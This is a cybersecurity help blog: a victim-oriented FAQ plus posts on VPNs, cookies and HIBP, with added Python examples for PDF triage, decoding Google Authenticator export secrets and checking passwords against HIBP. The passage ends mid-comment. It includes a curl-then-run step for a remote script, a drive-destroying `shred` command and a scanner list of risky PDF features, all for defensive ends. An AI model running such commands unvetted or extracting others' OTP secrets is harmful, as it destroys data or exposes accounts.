Sunday, September 29, 2024

Cybersecurity FAQ

 


I regularly contribute to a subreddit named Cybersecurity_help and a few other subreddit groups on Reddit.com, where I help answer questions on a wide range of topics, including online safety, identity theft, scams, extortion, malware, and viruses. I often encounter repeated questions in these forums, so I decided to consolidate all the frequently asked questions (FAQs) in one place. This way, cybercrime victims seeking help or advice can find answers and support for many of the frequently asked questions here. While this isn’t a comprehensive list, it covers many of the questions I’ve seen posted in these forums. This will be a living blog to which I will continually add as I find more of these repeated questions.

FAQs

1. Someone on the internet says they know my IP address, I am scared.

There is a common misconception among many internet users that knowing their IP address somehow gives someone the power to “hack” them. This myth has been spread by non-technical users, social media, and news outlets, among others. The fact is, every website you visit knows your IP address because it needs this information to send content (text, images, etc.) to your browser so that it can be displayed on your screen. This is how everything on the internet works, not just websites. In addition to your IP address, your internet browser provides much more information to the websites you visit than you may realize. Visit this link (https://myip.selvansoft.com) to see some (not all) of the details your browser shares with websites you visit. An IP address is just a number; only your Internet Service Provider (ISP) knows that it was assigned to you, and they will not disclose your information unless they receive a request from law enforcement accompanied by a proper court order. Being afraid that someone knows your IP address is like worrying that people saw your car’s license plate number while you were driving around the city. Unless you’ve committed a crime and are fleeing from law enforcement, this isn’t a problem. Similarly, if you haven’t done anything unlawful online, you have nothing to worry about if someone claims they have your IP address. By itself, an IP address does not get anyone into your device. About the most a stranger can do with a home IP is look up a rough location (typically your ISP’s city) or flood your connection with junk traffic, which is a nuisance rather than a break-in and usually goes away once your router picks up a new address. Anything beyond that requires an actual vulnerability on your device or a password they already have, and the IP address contributes nothing to either.

2. I got an email mentioning Pegasus, is this real?

The Pegasus email scam is one of the most popular scams in circulation, and yes, it is 100% a scam. While it is true that Pegasus is a sophisticated spyware developed by the Israeli cyber-arms company NSO Group, it is sold to government agencies and used for surveillance of specific, hand-picked targets such as journalists, activists, and politicians. Random email recipients are not the target, and a real operator would never email you to announce that you are infected. The idea behind this scam email is to use scare tactics with bits and pieces of information like your address, name, email, phone number, a picture of your house from Google Maps, etc., all of which are publicly available, to make you send them money. Whatever you do, never send money. Just delete and block this email as spam and move on with your life. No one is going to come after you.

3. Does VPN keep me safe online?

First, a VPN (Virtual Private Network) is a privacy tool: it masks your IP address from the sites you visit and encrypts your traffic between your device and the VPN server. It is not a malware or account-protection tool. While privacy and security do overlap, they are distinct concepts. Privacy is about protecting your personal information and activities from being observed, while security involves protecting your data and device from unauthorized access and threats. So if you think running a VPN will protect you from all compromises, you are misinformed. You could run a VPN and still visit a malware site, install pirated software, or use a compromised network, and your device would be compromised just like anyone not using a VPN. Moreover, pretty much all web traffic today is already encrypted. As long as you are using HTTPS, the content of what you send and receive is protected from anyone on the network, and you don’t necessarily need a VPN. See additional details at the blog (https://blog.selvansoft.com/2024/06/vpn-myth-vs-reality.html).

4. My name, address, phone are listed on a website, what do I do?

While this is a problem, the short answer is that there isn’t much you can do other than ask them to remove it, which is not an easy task. You can follow this blog (https://blog.selvansoft.com/2022/07/how-much-of-your-info-is-freely.html) for guidance or try a paid service like Incogni or Optery. The reality is that many data aggregator sites collect your publicly available data, such as your name, address, and phone number, and sell it legally to anyone online. This is a big business, and these data aggregator sites are popping up all over and are here to stay.

5. I sent intimate photos to someone online, and now they are threatening to share them with my contacts if I don’t send them money. I am scared. What should I do?

There is nothing you can do at this point but block and ignore them. Most importantly, never send any money; paying only confirms that you will pay, and the demands will never stop. Report the profile to the platform it contacted you on so the account gets taken down, and keep screenshots of the threats in case you need to make a police report. Most likely, the scammer will move on to the next victim. However, be prepared for the possibility that they might get angry and send your pictures to your contacts if they have access to them. While it’s unlikely, since their time is better spent scamming someone else, there’s a chance they might persist if they believe you’re a high-value target with the potential for a significant payout. In that case, they would likely continue with the charade. I hope you learned your lesson.

6. I see a lot of attempted logins on my Microsoft account. How do I stop it?

Though it may sound strange, the short answer is, it is normal these days to see multiple attempts daily or even hourly, as shown in the screenshot below.

With so many data breaches in the last decade or so, pretty much everyone’s email address has been leaked. You can check yours at HIBP (https://haveibeenpwned.com/). Scammers use automated scripts to attempt to log in with your email address and passwords from those leaks, an attack technique called credential stuffing, and it will not stop. As long as your account is well protected with a unique, strong password plus MFA with an authenticator app or, better, a hardware key, or passwordless login, these attempts fail and you have nothing to worry about; just ignore them. You can reduce the number of attempts by reducing the number of email aliases on the account that are allowed to sign in: every alias that can sign in is another address attackers can try, so the attempts multiply with the alias count. Restricting sign-in to one alias and removing sign-in ability from the others lowers both the noise and the exposure. Follow the link (https://account.live.com/SignInPreferences) while logged into your Microsoft account and check whether you have multiple aliases with sign-in privilege. Finally, by creating a brand-new alias and allowing only that alias to sign in, you can stop these attempts altogether … well, until your new alias is leaked down the road 😁.

7. Is using public Wi-Fi safe? 

Public Wi-Fi (airport, hotel, coffee shop, etc.) comes with inherent security risks. While complete safety is impossible to achieve, you can significantly improve your online security by following good cyber hygiene practices. Avoid sensitive transactions like logging into bank accounts, credit card portals, or other financial platforms while connected. If a website does not offer HTTPS, do not visit it; make a habit of only visiting HTTPS sites, even on private networks. HTTPS protects what you send and receive, though the network operator can still see which hostnames you connect to. Enable your firewall: most operating systems come with one built in, so turn it on and block all inbound connections, which keeps the other devices on the same Wi-Fi from reaching any service running on your machine. Keeping your firewall enabled is a simple yet effective way to bolster your security on any network, public or private. Optionally, you can run a VPN for an additional layer of protection, but it’s not strictly necessary. Contrary to popular belief, a VPN doesn’t make you invincible. Here is a blog (https://blog.selvansoft.com/2024/06/vpn-myth-vs-reality.html) that outlines what a VPN is and is not, if you’re interested in reading it.

8. I opened a sketchy PDF file. Is my computer compromised?

A PDF is a document format, but it can carry more than pages: JavaScript, actions that run when the file is opened, launch actions that start another program, embedded files, and links. None of that can do anything on its own; it needs either a vulnerability in your PDF reader or your cooperation (clicking a link, opening an embedded attachment, approving a prompt). Therefore, the security of your system depends mostly on the PDF reader you use and how current it is. If you keep your operating system and applications updated with the latest security patches, you should be fine. For example, if you opened the PDF in your browser, which is typically the case, the viewer runs inside the browser sandbox, and as long as the browser is up to date you should be fine even if the PDF is malicious. If you use a desktop reader, keep it updated and turn off its JavaScript support, which you rarely need. If you only downloaded the PDF and did not open it, it cannot have done anything; just delete it and move on. If you did open it and the reader asked you to approve something, install something, or open an attachment, and you said yes, treat the machine as possibly infected and follow FAQ #11 below.
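Before opening a questionable PDF, it is worth looking at what it carries. The following is an added example written for this FAQ, not code from the blog: a small pdfid-style triage script that reads the raw bytes and reports the PDF name tokens that mean the file can do more than render pages (/JavaScript, /OpenAction, /Launch, /EmbeddedFile and so on). It also decodes the #xx hex escapes the PDF syntax allows inside names, since writing /J#61vaScript instead of /JavaScript is a common trick to slip past keyword scanners. The two sample files at the bottom are constructed inline for the demonstration. Compressed object streams are not decoded, so a clean result is not a guarantee; it is a first check, not a verdict.

```python
import re
from collections import Counter

# Added example (not from the blog): a pdfid-style triage of a downloaded PDF.
# It looks only at name tokens in the raw bytes; content inside compressed
# streams is not decoded, which is why /ObjStm itself is flagged.
RISKY_NAMES = {
    "/JavaScript": "embedded JavaScript",
    "/JS": "JavaScript action",
    "/Launch": "launches an external program",
    "/EmbeddedFile": "carries an embedded file",
    "/OpenAction": "runs an action as soon as the file is opened",
    "/AA": "automatic actions on page or form events",
    "/URI": "clickable external link",
    "/ObjStm": "compressed object streams (can hide the names above)",
}
ACTIVE = {"/JavaScript", "/JS", "/Launch", "/EmbeddedFile"}

_NAME_TOKEN = re.compile(rb"/[^\s/\[\]<>(){}%]+")   # a PDF name, up to a delimiter
_HEX_ESCAPE = re.compile(rb"#([0-9A-Fa-f]{2})")      # #xx escape allowed inside names


def normalize_name(token: bytes) -> str:
    """Decode #xx escapes so /J#61vaScript compares equal to /JavaScript."""
    raw = _HEX_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), token)
    return raw.decode("latin-1")


def triage_pdf(data: bytes) -> dict:
    """Scan raw PDF bytes; return the risky names found and a coarse verdict."""
    if not data.lstrip().startswith(b"%PDF-"):
        return {"is_pdf": False, "findings": {}, "obfuscated_names": 0,
                "verdict": "not a PDF (wrong header)"}
    findings, obfuscated = Counter(), 0
    for token in _NAME_TOKEN.findall(data):
        name = normalize_name(token)
        if name in RISKY_NAMES:
            findings[name] += 1
            # No normal PDF writer hex-escapes plain letters in these names;
            # doing so is a classic trick to evade keyword scanners.
            if b"#" in token:
                obfuscated += 1
    if findings.keys() & ACTIVE:
        verdict = "active content present, do not open outside a sandbox"
    elif findings:
        verdict = "no active content, but review the flagged features"
    else:
        verdict = "no risky features found (compressed streams not inspected)"
    if obfuscated:
        verdict = "obfuscated names found, treat as malicious; " + verdict
    return {"is_pdf": True, "findings": dict(findings),
            "obfuscated_names": obfuscated, "verdict": verdict}


def triage_file(path: str) -> dict:
    """Convenience wrapper: triage a PDF on disk without opening it in a reader."""
    with open(path, "rb") as fh:
        return triage_pdf(fh.read())


# Constructed samples (not real files): a benign catalog, and one whose
# /OpenAction runs JavaScript with the action name hex-escaped.
SAMPLE_BENIGN = (
    b"%PDF-1.4\n1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n%%EOF\n"
)
SAMPLE_MALICIOUS = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >> endobj\n"
    b"3 0 obj << /S /J#61vaScript /JS (app.alert('pwned')) >> endobj\n"
    b"%%EOF\n"
)

if __name__ == "__main__":
    for label, blob in (("benign", SAMPLE_BENIGN), ("malicious", SAMPLE_MALICIOUS)):
        result = triage_pdf(blob)
        print(f"{label}: {result['verdict']}  findings={result['findings']}")
```

Run it on a real download with triage_file("suspicious.pdf"). /URI and /AA show up in plenty of legitimate documents (every clickable link is a /URI), which is why they only rate "review", while /JavaScript, /Launch and /EmbeddedFile have no business in a PDF someone sent you unsolicited.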

9. I was part of a data breach; how do I protect myself from identity theft? 

First, you are not alone. Given the numerous major data breaches in recent years, many people’s SSNs are unfortunately exposed. For instance, the AT&T breach disclosed in 2024 reportedly compromised the SSNs of tens of millions of current and former customers, and the recent National Public Data leak included a vast number of individuals. To prevent identity theft, freeze your credit reports at all three bureaus (Equifax, Experian, and TransUnion). A freeze restricts access to your credit file, so a criminal who has your SSN still cannot open new accounts in your name. Freezing is free, and you can easily unfreeze (“thaw”) and refreeze as needed, such as when applying for a loan or credit card. Here’s a simple blog (https://blog.selvansoft.com/2023/05/howto-credit-freeze.html) outlining how to freeze your credit.

10. I changed my password and enabled MFA, but an attacker still accessed my account. How?

It is likely that you have info-stealing malware on your device that exfiltrated your authenticated session token (the cookie your browser holds after you log in). Alternatively, you may have logged in through a phishing page that proxied the real site and captured the cookie on the way through, or installed a malicious browser extension. Either way, a remote attacker has a valid session token for your account, a form of attack called session hijacking. Keep in mind that strong passwords, MFA, and hardware keys are irrelevant here, because they are checked at login and the attacker is skipping login: the stolen token lets them act as you until it expires, which can be hours, days, or even weeks, depending on how session management is implemented on the website. To remove the access, invalidate your sessions using the account’s “sign out of all devices” option (or a password change, on sites that end sessions when the password changes), then check the account for persistence the attacker may have added, such as a new recovery email or phone number, app passwords, or mail-forwarding rules. Do this only after the device is clean; if the stealer is still running, the new password and the new session token are taken the same way. If you find your device is infected with a virus or malware, follow FAQ #11 below to remove it.

11. My computer is infected with malware. How did it happen, and how do I recover?

The root cause could be anything from installing pirated software or game cheats to clicking on malicious links or visiting compromised websites (inadvertently or intentionally), and more. Run a full scan of your device with a malware scanner like Malwarebytes and/or a good, up-to-date antivirus tool to remove the infection. In most cases, that is all you need to do. However, while most removal tools do a good job, they may not be effective against a persistent rootkit or bootkit. In that case, you may have to do a complete wipe (wipe the whole drive, including the EFI partition) and reinstall the OS. This is quite different from the typical “Windows reset/reinstall” step most people are familiar with, which leaves partitions such as the EFI system partition untouched and so does not remove things hiding there. An explanation of how to do that is outside the scope of this answer, but you can consult an expert to help you accomplish it, or you can do it yourself by following FAQ #13 below. Afterwards, change the passwords of the accounts you used on the infected machine, from a clean device. Finally, to prevent future attacks, be cautious about the websites you visit, avoid clicking on random links, and refrain from downloading pirated software or cracks.

12. How do I backup my Google Authenticator secrets?

As a cybersecurity professional and practitioner, I would not advocate syncing authenticator secrets to any form of cloud storage; instead, keep them local. MFA is your second layer of protection, and having the secrets that generate your OTP codes reside in the cloud, tied to the same Google account, means a compromise of that account (or a future data leak) hands the attacker your second factor along with the first. Follow my instructions below to detach Authenticator from Google cloud sync and take responsibility for guarding your secrets under your control.

First, export all your secrets. Google Authenticator lets you export all secrets to a giant QR code (Transfer accounts → Export accounts). That QR code contains the raw secrets in plain form, so anyone who gets hold of the image can generate your codes: treat it exactly like a password. Save the QR code image to your local drive, confirm that it decodes (for example by importing it into a second authenticator app and checking that a code matches) before you delete anything, and then follow the steps.

  1. Enable google sync.
  2. Now delete all the secrets.
  3. Let google sync empty Authenticator.
  4. Now, disable google sync.
  5. Import everything back from the giant QR code you saved above.
  6. Keep the QR code in a safe place or better yet, print a paper copy to store it.

Ultimately, Authenticator cloud syncing boils down to the "convenience over security" argument. In the digital age, online security is your lifeline. Therefore, I generally advise everyone to never prioritize convenience over security.
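To make the "treat the QR code like a password" point concrete, and to give you a way to verify the export before step 2 deletes anything, here is an added example (not from the blog, and not Google's code) that decodes what the export QR actually contains. The QR encodes a URI of the form otpauth-migration://offline?data=..., where data is a base64 protobuf message; the field numbers used below follow the community-documented layout of that message and are an assumption, not an official specification. The sample URI is constructed inline from the RFC 6238 test-vector secret, so the TOTP codes it produces can be checked against the RFC.

```python
import base64
import hashlib
import hmac
import struct
from urllib.parse import parse_qs, quote, urlparse

# Added example, not from the blog or from Google. Field numbers below are the
# community-documented MigrationPayload layout (an assumption, not an official spec).


def _varint(n: int) -> bytes:
    out = bytearray()
    while True:
        byte, n = n & 0x7F, n >> 7
        out.append(byte | (0x80 if n else 0))
        if not n:
            return bytes(out)


def _read_varint(buf: bytes, i: int):
    n = shift = 0
    while True:
        byte, i = buf[i], i + 1
        n |= (byte & 0x7F) << shift
        if not byte & 0x80:
            return n, i
        shift += 7


def _field(num: int, value) -> bytes:
    """Encode one field: bytes -> length-delimited (wire type 2), int -> varint (0)."""
    if isinstance(value, bytes):
        return _varint(num << 3 | 2) + _varint(len(value)) + value
    return _varint(num << 3) + _varint(value)


def _parse_message(buf: bytes) -> list:
    """Return [(field_number, value)] pairs; only wire types 0 and 2 occur here."""
    fields, i = [], 0
    while i < len(buf):
        key, i = _read_varint(buf, i)
        num, wtype = key >> 3, key & 7
        if wtype == 0:
            val, i = _read_varint(buf, i)
        elif wtype == 2:
            ln, i = _read_varint(buf, i)
            val, i = buf[i:i + ln], i + ln
        else:
            raise ValueError(f"unexpected wire type {wtype}")
        fields.append((num, val))
    return fields


# OtpParameters: 1 secret, 2 name, 3 issuer, 4 algorithm, 5 digits, 6 type, 7 counter
ALGORITHM = {1: "sha1", 2: "sha256", 3: "sha512", 4: "md5"}
DIGITS = {1: 6, 2: 8}
OTP_TYPE = {1: "hotp", 2: "totp"}


def parse_migration_uri(uri: str) -> list:
    """Decode a Google Authenticator export URI into plain account records."""
    data = parse_qs(urlparse(uri).query)["data"][0]
    accounts = []
    for num, val in _parse_message(base64.b64decode(data)):
        if num != 1:                      # payload field 1 = repeated otp_parameters
            continue
        p = dict(_parse_message(val))
        accounts.append({
            "secret_b32": base64.b32encode(p[1]).decode(),   # the form other apps accept
            "name": p.get(2, b"").decode(),
            "issuer": p.get(3, b"").decode(),
            "algorithm": ALGORITHM.get(p.get(4), "sha1"),
            "digits": DIGITS.get(p.get(5), 6),
            "type": OTP_TYPE.get(p.get(6), "totp"),
        })
    return accounts


def totp(secret: bytes, unix_time: int, digits: int = 6, step: int = 30) -> str:
    """RFC 6238 TOTP (HMAC-SHA1): proves a decoded secret is live."""
    mac = hmac.new(secret, struct.pack(">Q", unix_time // step), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def build_migration_uri(accounts: list) -> str:
    """Encode records into the export form; used here only to build the sample input."""
    body = b""
    for a in accounts:
        params = (_field(1, a["secret"]) + _field(2, a["name"].encode())
                  + _field(3, a["issuer"].encode()) + _field(4, 1)   # sha1
                  + _field(5, 1) + _field(6, 2))                     # 6 digits, totp
        body += _field(1, params)
    body += _field(2, 1) + _field(3, 1) + _field(4, 0)   # version, batch_size, batch_index
    return "otpauth-migration://offline?data=" + quote(base64.b64encode(body).decode(), safe="")


# Constructed sample: one account using the RFC 6238 test-vector secret.
SAMPLE_URI = build_migration_uri([
    {"secret": b"12345678901234567890", "name": "alice@example.com", "issuer": "Example"},
])

if __name__ == "__main__":
    for acct in parse_migration_uri(SAMPLE_URI):
        secret = base64.b32decode(acct["secret_b32"])
        print(acct["issuer"], acct["name"], acct["type"], "code at T=59:", totp(secret, 59))
```

To use it on your own export, scan the QR image with any QR decoder (for example the zbarimg tool) and pass the resulting otpauth-migration URI to parse_migration_uri. If every account decodes and totp() on a decoded secret matches what the app shows right now, the backup is good and you can proceed with step 2. Notice that nothing here required a password: whoever holds the image holds the secrets, which is the whole reason to keep it offline and, as the steps above say, preferably on paper.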

13. How do I completely wipe my hard drive to remove a rootkit or to dispose of it with no sensitive information?

Contrary to popular belief, deleting partitions and formatting a drive does not truly wipe data. While it renders the data inaccessible to the operating system, the actual data persists on the drive until overwritten by new information. Therefore, if your system was compromised by a bootkit (which commonly hides in the EFI system partition), repartitioning or formatting does not guarantee its removal. To get a truly clean drive, every sector must be overwritten with zeros (or random bytes) before partitioning and formatting to install a fresh OS. Two caveats: a software overwrite is reliable on a spinning hard drive, but on an SSD the controller’s wear levelling means some old blocks can escape it, so for an SSD prefer the drive’s own secure-erase command (ATA Secure Erase via hdparm, or "nvme format" for NVMe drives); and no disk wipe touches a firmware implant that lives in the motherboard’s UEFI flash rather than on the disk, which is rare but needs a firmware reflash instead. While numerous methods exist for wiping a drive clean, here's a straightforward approach if you know basic command-line skills in Linux.

First, download a Linux distribution (e.g., Ubuntu) to a USB drive, then shut down your machine and boot from it (adjust the BIOS/UEFI settings to prioritize USB boot). Once in Linux, open a terminal and type "sudo su" to gain root privileges. Identify the device file corresponding to your Windows hard drive/SSD. For a SATA drive this will resemble /dev/sda, /dev/sdb and so on; for an NVMe drive, /dev/nvme0n1. For reference, the screenshot below shows a Windows hard drive at /dev/sdi. Ignore other details in the screenshot as they pertain to a different context.


You can determine your Windows drive's device file by running "fdisk -l" (or "lsblk -o NAME,SIZE,MODEL") and examining the output: look for the drive whose size and model match your internal disk and which carries the EFI System and Microsoft basic data partitions. Double-check that it is not the USB stick you booted from, since the command below destroys everything on the target. Once you identify your Windows drive device file, execute the following command, replacing "/dev/sdi" with your actual device file.

shred -vf -n1 /dev/sdi 

Be prepared for a lengthy process (potentially hours) depending on the drive's size. With -n1, shred makes a single pass of random data, which is enough to destroy a bootkit; if you are disposing of the drive, drop the -n1 so shred uses its default of three passes (and for an SSD use the secure-erase command mentioned above). While the wipe runs, it is a good idea to scan the data you backed up from the infected drive, and it is easy to do from the same Linux session. Install ClamAV with "apt install clamav", let "freshclam" download the current signature database, then identify the mount point of the USB drive holding your backup and run "clamscan -r -i <mount point>" on it. This can run in a second terminal at the same time as the wipe. Once the drive is completely wiped and your backup data has been scanned, install a fresh copy of Windows from read-only (or freshly written) installation media. At this point, your Windows installation should be as clean as a whistle.

14. I run Minecraft server for my friends and notice random IPs are attempting to connect to my machine. What do I do to protect my machine?

Running a service publicly on your machine attracts attackers worldwide scanning for vulnerable services to exploit. Although your firewall may block attempts to connect to other ports, the port you forwarded is by definition open, and the number of attempts against it will keep growing. Eventually, one may succeed if the service has an exploitable known vulnerability at that moment; it is not a question of if, but when. Keep in mind that all services have vulnerabilities (both known and zero-day), and Minecraft has had its fair share, the best known being Log4Shell (CVE-2021-44228) in the Java edition in 2021, which gave remote code execution to anyone who could send a chat message to the server. With that said, if you must run the game server while accepting the risks outlined above: keep the server software updated, run it under an unprivileged user account rather than your own, enable the server's allowlist (whitelist) so only your friends' accounts can join, and disable UPnP if it is enabled on your router. In my professional opinion, UPnP poses a significant security risk, as it lets any program on your network open ports automatically, potentially allowing unauthorized access. If you require specific ports open for gaming, forward them manually instead of relying on UPnP.

15. An attacker hacked everything (laptop, phone, router, network etc.) simultaneously, how do I recover?

The scenario you are describing, i.e., a hacker installing malware on all of your devices simultaneously, is highly unlikely. It is improbable that someone (or something) could infect a heterogeneous collection of devices across different architectures and operating systems with a single piece of malware, virus, or rootkit. Such an all-in-one compromise is simply not feasible in the real world and is more likely to occur only in movies. What does happen is that one account signed in on all of those devices (your Google or Apple account, or your email) is compromised, and because it syncs to everything, it looks as if every device was hacked at once. Secure that account first: change its password from a device you trust, enable MFA, sign out all sessions, and review the recovery options. Also change the router's admin password if it is still the factory default.


Sunday, June 30, 2024

VPN Myth vs. Reality

A VPN (Virtual Private Network) is one of the most misunderstood technologies among non-technical people. Actually, I have come across many technical people with a complete and total misunderstanding of what a VPN is and is not. These days the term VPN is touted as a solution for all things security and is advertised by VPN vendors as the one-size-fits-all security solution. This is a misconception and a false sense of security; a VPN is not a magic shield for online safety. Let’s take a look at what a VPN is and is not.

What VPN is?
Simply put, a VPN creates an encrypted network tunnel between your device (laptop, phone, etc.) and a VPN server. All your traffic passes through the tunnel in encrypted form to the VPN server, which makes it harder for anyone between you and that server to see your online activity and, most importantly, where you are located. The websites you visit see only the VPN server’s IP address, not your device’s. It is this aspect that allows journalists, activists, and the like to hide from governments that watch everything they do. Similarly, cybercriminals can leverage it to mask their identity. It also allows people to reach services (for example, video streaming) that are "geo-fenced", i.e., not allowed from certain countries due to regulation or licensing. Finally, corporations use VPNs to keep sensitive corporate data from travelling over public networks in the clear and to provide access to internal company resources. That is pretty much what a VPN is in a nutshell.

What VPN is not?
A VPN does not protect you from cybercriminals, viruses, trojans, spam, adware, identity theft, etc. Remember I mentioned above that a VPN would prevent anyone from tracking your online activity? Well, that is not entirely true: once you log in, the website knows exactly who you are, and logged-in accounts and browsing habits can still be tracked (see my earlier blog on third-party cookies) by the websites you visit regardless of which IP address you arrive from. As mentioned earlier, a VPN isn't antivirus, so even with a VPN running you still need separate protection from malware, viruses, trojans, etc. Also, there is no guarantee of complete privacy: the VPN provider now sees everything your ISP used to see, some providers log your activity and hand it over to authorities when requested depending on local and international laws, and leaks at the VPN server can happen.

Do you need VPN?
The short answer is no, unless you have a specific reason to hide your online activity or your location. For most everyday users, this isn't necessary. With the widespread adoption of HTTPS, which encrypts data between your browser and the websites you visit, a VPN adds little value for general online safety. In fact, using a VPN can significantly reduce your bandwidth despite the vendor’s claims of a "fast" solution. About 15 years ago, when HTTPS was not widely deployed, a VPN was the only way to encrypt your data against prying eyes, and even then only up to the point where the VPN tunnel ended. That is no longer the case today, as nearly all websites are protected by end-to-end encrypted connections.

Ultimately, whether you use a VPN or not, inherent risks are associated with using public Wi-Fi, which is beyond the scope of this blog. A VPN encrypts the traffic you send out; it does nothing about traffic coming in from other devices on the same network. So unless your host firewall is on and blocking inbound connections, any service listening on your device is reachable by whoever is sitting nearby in the coffee shop, VPN or not, and that is how someone next to you can get into your machine.


Monday, May 6, 2024

Disable third-party cookie

What is third-party cookie?
Have you ever wondered why websites suddenly start serving you ads for specific products everywhere you browse? For example, after you visit an eyewear website or search for glasses on Amazon, you'll notice you get a lot of ads related to eyeglasses or sunglasses. This is done using third-party cookies stored on your device which are primarily used for targeted advertising. 

Why do you need to disable third-party cookie?
They track your browsing activity across different websites, building a profile of your interests to be used by advertisers to serve you ads that are more likely to be relevant to you. As such, they raise significant privacy concerns because they allow companies to track your online movements across multiple websites, building a detailed profile without your full awareness.

How to disable third-party cookie?
While Firefox and Safari browsers have blocked third-party cookies by default for quite some time, Google Chrome, on the other hand, had a deadline to phase out third-party cookies by the end of 2024. However, Google recently announced that it is delaying the phase-out of third-party cookies beyond 2024 (https://searchengineland.com/google-third-party-cookie-phase-out-third-delay-439864)

If you are a Chrome browser user like me, you don’t need to wait for Google to phase out third-party cookies. You can actually disable them in Chrome by typing "chrome://settings/cookies" in the address bar and selecting "Block third-party cookies." I've had this setting enabled since its introduction and haven't encountered any significant website functionality issues. Once you do that, your browser address bar will show a blocked icon for every site you visit that uses third-party cookies, as shown below …

More interestingly, the following is a screenshot of my login session with my bank (a major US bank) website. As you can see, the bank’s webpage code indeed has embedded content from facebook.com. However, since third-party cookies are blocked, it will not be able to read its cookie, which is what I want. As a matter of fact, this is exactly how Facebook learned about my banking activity, which I documented in detail in a blog post last year. You can read it at https://blog.selvansoft.com/2023/06/facebook-knows-you-way-more-than-you.html to learn how the information was gathered.

Ideally, I’d like to block facebook.com here all together (i.e. disable it like I did with public.cobrowse.oraclecloud.com). However, it is not very practical because if I do that, I need login & authenticate to facebook.com every single time which is painful, so I let it be there at least I know they are not going to learn my banking activity for sure which is good enough.

Finally on a related cookie topic, I learned an interesting fact from a tech podcast with Steve Gibson (grc.com) on the annoying cookie permission pop-ups (GDPR compliance) we see on every website these days. It turns out that about 65% of the websites ignore what you choose and place tracking cookies anyway. You can view/hear the relevant section of the podcast here and here.

Tuesday, April 2, 2024

Free 1TB cloud storage?


Who says there is no free lunch? I saw this ad from TeraBox (terabox.com) for a free/permanent 1TB cloud storage which I thought was too good to be true. So, I created a free account and attempted to upload a huge 32GB file, but it failed saying for free tier, the largest file you are allowed to upload is 4GB. Ok fair enough, so I chopped the files into 4GB pieces and tried again. To my surprise, the free tier account uploaded all of them without any issue (see screenshot below), but it took longer since they do throttle upload speed for free tier which is totally understandable.

 

In addition to the throttled upload speed, the download speed is also heavily throttled, so it takes longer to download your files. But if you are only interested in storing your data for backup, it doesn’t really matter how long a download takes, especially considering it is a free service. If you really need all your data downloaded fast, you can always sign up for the paid version ($3.49/month at the time of this writing), download everything, and switch back to the free tier 😃

The bottom line is, I would not recommend this as your only, primary cloud backup, but it is certainly a great option as secondary storage … it's free anyway! As with any free third-party cloud, encrypt the data before uploading it (for example, as a password-protected archive), since you have no control over who at the provider can read what you store there.

If you decide to use this service, do not install their phone app or native app, which are full of ads on the free tier. Just go to the terabox.com website, sign up for a free account on your laptop/desktop, and upload/download files through the website.


Thursday, January 18, 2024

Is your computer compromised?


Easy way to check if your computer is/was compromised now or in the past

With the recent addition of the Naz.API dataset (a massive collection of over a billion stolen username and password pairs, much of it from info-stealer malware logs) to the HIBP service ("Have I Been Pwned", a service by Troy Hunt, troyhunt.com), it is now very easy to check whether a computer you used is or was compromised by information-stealing malware.

Go to the HIBP service at https://haveibeenpwned.com, enter your e-mail address (don’t worry, the site only looks the address up; it is safe to do), and check the search results. The results may span several pages, so make sure to scroll down and check all the breaches your email is listed in. Keep in mind that it is not at all unusual to see your email show up in multiple breaches. For example, see the screenshot below of my own email search.


As you scroll through the list, check whether your email is listed for Naz.API. If it is, that is a clear indication that a computer you logged in from (your own, or one you used at some point) was infected by info-stealing malware and credentials were taken from it. At the very least, make sure none of your current passwords are in the leaked set. There are a couple of ways to check. Some password managers, 1Password for example, can check all your passwords against the HIBP Pwned Passwords database. If you don’t use a tool that supports this, you are welcome to use my PHP script from my GitHub repo below, which does the same thing; the only caveat is that it checks one password at a time, so you have to repeat it for each of your passwords. A tool that uses HIBP's Pwned Passwords range API sends only the first five characters of the password's SHA-1 hash, so the password itself never leaves your machine.

How to run: If you are on a Mac or Linux, you can run the script directly with the two commands shown below. If you are on Windows, you have to install PHP, curl, etc. first, which is beyond the scope of this blog.

curl -s https://raw.githubusercontent.com/aselvan/scripts/master/security/pwned_password.php -o /tmp/pwned_password.php
php /tmp/pwned_password.php

If any of your current passwords is listed in HIBP according to these tools (1Password, my script, or any other that checks against HIBP), change it ASAP and enable 2FA if that’s not already in place. If your current password is not found, it means an old password you used in the past was compromised. Still, it is a good idea to change all your passwords ASAP, and since a stealer takes everything the infected browser had, assume the saved passwords and active sessions from that machine are exposed too.
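For readers who would rather not install PHP, or who want to see what "checking a password against HIBP" actually sends over the wire, here is an added Python example. It is not the blog's PHP script; it is a separate implementation of the same check using HIBP's Pwned Passwords range API (k-anonymity): the password is hashed locally with SHA-1, only the first five hex characters are sent to api.pwnedpasswords.com, and the returned list of suffixes is matched on your machine. The only network call is fetch_range_live; the sample range body is constructed inline around the real SHA-1 of "password" with invented counts, so the example runs offline.

```python
import hashlib
import urllib.request

# Added example, not the blog's PHP script: a Pwned Passwords check using
# HIBP's k-anonymity range API. Only the first five hex characters of the
# password's SHA-1 leave your machine; the suffix is matched locally.
RANGE_URL = "https://api.pwnedpasswords.com/range/"


def sha1_hex(password: str) -> str:
    return hashlib.sha1(password.encode("utf-8")).hexdigest().upper()


def split_hash(hexdigest: str):
    """The range API takes the first 5 hex chars; the remaining 35 stay local."""
    return hexdigest[:5], hexdigest[5:]


def count_in_range(range_body: str, suffix: str) -> int:
    """Parse a range response ('SUFFIX:COUNT' per line) and return the count for one suffix.

    Padded responses (Add-Padding: true) include fake suffixes with count 0,
    which this treats the same way as a miss.
    """
    for line in range_body.splitlines():
        found, _, count = line.strip().partition(":")
        if found.upper() == suffix:
            return int(count or 0)
    return 0


def fetch_range_live(prefix: str) -> str:
    """The only network call: GET /range/<prefix> from api.pwnedpasswords.com."""
    req = urllib.request.Request(
        RANGE_URL + prefix,
        headers={"Add-Padding": "true", "User-Agent": "pwned-password-check-example"},
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8")


def check_password(password: str, fetch_range=fetch_range_live) -> int:
    """Return how many times the password appears in HIBP (0 = not found)."""
    prefix, suffix = split_hash(sha1_hex(password))
    return count_in_range(fetch_range(prefix), suffix)


# Constructed range body for the prefix of sha1("password"), whose real digest is
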